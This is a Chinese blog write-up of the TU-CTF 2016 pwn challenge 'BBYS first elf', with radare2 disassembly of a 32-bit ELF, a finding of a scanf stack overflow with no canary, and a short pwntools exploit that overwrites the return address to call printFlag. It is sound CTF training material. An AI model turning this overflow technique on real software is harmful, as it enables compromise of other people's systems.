CTF练习-TU-CTF-2016 pwn BBYS-first-elf-25 记录
2016-12-07 10:57
495 查看
题目简介
太水了没啥好简介的,radare2打开(我用的linux,闲win虚拟机太麻烦一般懒得用ida)[0x080485c9]> iI havecode true pic false canary false nx true crypto false va true intrp /lib/ld-linux.so.2 bintype elf class ELF32 lang c arch x86 bits 32 machine Intel 80386 os linux minopsz 1 maxopsz 16 pcalign 0 subsys linux endian little stripped false static false linenum true lsyms true relocs true rpath NONE binsz 7591
然后查看main函数,发现就是一个输入一个输出,输入使用了scanf,输入的是一个字符串,漏洞很明显。。。栈溢出
[0x080485c9]> s main [0x080485c9]> pdf ;-- main: / (fcn) sym.main 60 | sym.main (); | ; var int local_4h @ esp+0x4 | ; var int local_14h @ esp+0x14 | ; JMP XREF from 0x08048487 (entry0) | ; DATA XREF from 0x08048487 (entry0) | 0x080485c9 01:002b 55 push ebp | 0x080485ca 01:002c 89e5 mov ebp, esp | 0x080485cc 01:002d 83e4f0 and esp, 0xfffffff0 | 0x080485cf 01:002e 83ec20 sub esp, 0x20 | 0x080485d2 01:002f c70424ac8604. mov dword [esp], str.This_program_is_hungry._You_should_feed_it. ; [0x80486ac:4]=0x73696854 LEA str.This_program_is_hungry._You_should_feed_it. ; "This program is hungry. You should feed it." @ 0x80486ac ; const char * s | 0x080485d9 00:0000 e842feffff call sym.imp.puts ; int puts(const char *s); | 0x080485de 01:0030 8d442414 lea eax, dword [esp + local_14h] ; 0x14 | 0x080485e2 01:0031 89442404 mov dword [esp + local_4h], eax | 0x080485e6 01:0032 c70424d88604. mov dword [esp], 0x80486d8 ; [0x80486d8:4]=0x44007325 ; const char * format | 0x080485ed 00:0000 e86efeffff call sym.imp.__isoc99_scanf; int scanf(const char *format); | 0x080485f2 01:0033 c70424db8604. mov dword [esp], str.Do_you_feel_the_flow_ ; [0x80486db:4]=0x79206f44 LEA str.Do_you_feel_the_flow_ ; "Do you feel the flow?" @ 0x80486db ; const char * s | 0x080485f9 00:0000 e822feffff call sym.imp.puts ; int puts(const char *s); | 0x080485fe 01:0034 b800000000 mov eax, 0 | 0x08048603 01:0035 c9 leave \ 0x08048604 00:0000 c3 ret
题目分析
那么怎么利用呢? 刚开始想开启了NX,以为需要rop,可是25分啊,rop是不是太费神了一点,于是留个心眼,AFL一下[0x080485c9]> afl 0x080483b4 3 35 sym._init 0x080483f0 1 6 sym.imp.fflush 0x08048400 1 6 sym.imp.fgets 0x08048410 1 6 sym.imp.fclose 0x08048420 1 6 sym.imp.puts 0x08048430 1 6 loc.imp.__gmon_start__ 0x08048440 1 6 sym.imp.__libc_start_main 0x08048450 1 6 sym.imp.fopen 0x08048460 1 6 sym.imp.__isoc99_scanf 0x08048470 1 33 -> 95 entry0 0x080484a0 1 4 sym.__x86.get_pc_thunk.bx 0x080484b0 4 42 sym.deregister_tm_clones 0x080484e0 4 55 sym.register_tm_clones 0x08048520 3 30 sym.__do_global_dtors_aux 0x08048540 4 45 -> 44 sym.frame_dummy 0x0804856d 1 92 sym.printFlag 0x080485c9 1 60 sym.main 0x08048610 4 97 sym.__libc_csu_init 0x08048680 1 2 sym.__libc_csu_fini 0x08048684 1 20 sym._fini
好吧,如此明显的printFlag,因为没有canary,溢出之后返回地址指向printFlag即可。。
exp
from pwn import * def pwn(): r = process("./3d726802521a9ce2b24e2c3baf039915e48ad056") payload = 'a' * 24 + '\x6d\x85\x04\x08' r.sendline(payload) print(r.recv()) if __name__ == "__main__": pwn()
相关文章推荐
- TU-ctf-2016 pwn woO 分析记录
- CTF练习 TU-ctf-2016 pwn woO-50
- plaidctf-2016 Pwn试题小结
- js--打卡--12.25 DOM添加删除记录练习
- CTF-PWN练习之执行Shellcode
- 【CTF WEB】ISCC 2016 web 2题记录
- Python学习记录-2016-11-25
- ctf pwn 个人经验记录
- volga-ctf-quals-2016 pwn web_of_scicen_250 writeup
- nodejs-日常练习记录-使用express搭建static服务器.
- ctf日常学习记录(web)
- 第七周习题练习记录
- CTF练习平台 JavaScript ”点击一万次“ writeup
- 二维数组练习25_螺旋加密
- BugKuCTF(CTF-练习平台)——WEB-web基础$_GET
- 算法练习--微软面试题前25题
- C++练习题目记录
- 数组实现队列功能(C++练习记录)
- 2016春季练习——bfs简单题
- 2016秋季练习